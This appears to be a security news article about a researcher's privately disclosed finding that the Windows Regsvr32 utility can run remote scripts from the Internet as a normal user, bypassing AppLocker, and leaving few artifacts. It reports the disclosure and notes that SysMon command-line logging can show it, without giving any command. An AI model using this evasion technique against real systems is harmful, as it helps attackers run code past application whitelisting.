A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft’s AppLocker.
A researcher who requested anonymity found and privately disclosed the issue to Microsoft on Tuesday. It’s unknown whether Microsoft will patch this issue with a security bulletin, or in a future release.
The researcher said the issue was discovered while researching AppLocker bypasses.
“There’s really no patch for this; it’s not an exploit. It’s just using the tool in an unorthodox manner. It’s a bypass, an evasion tactic,” the researcher said.
Complicating matters is that Regsvr32 normally requires admin privileges to run in order to be able to register COM (component object model) objects and DLLs on the operating system.
“Only admins normally run this. In this case, I can run it as a normal user,” the researcher said. “I could call unregistered methods and execute them as a normal user.”
Documentation on Regsvr32 does not indicate that it would accept scripts from the Internet. Recent so-called fileless malware attacks have used Windows PowerShell to download malware from the Internet, and it appears this issue could be abused in a similar way.
The researcher said that attacks using this method would be tough to detect.
“There are not many artifacts left on the box to indicate it ran,” the researcher said, adding that a command line auditing tool such as SysMon would log that someone ran Regsvr32 with a URL in the parameter. “Because the file is downloaded from a URL, there would be a minimal footprint. I’m not sure there would be much left on the system to indicate it ran.”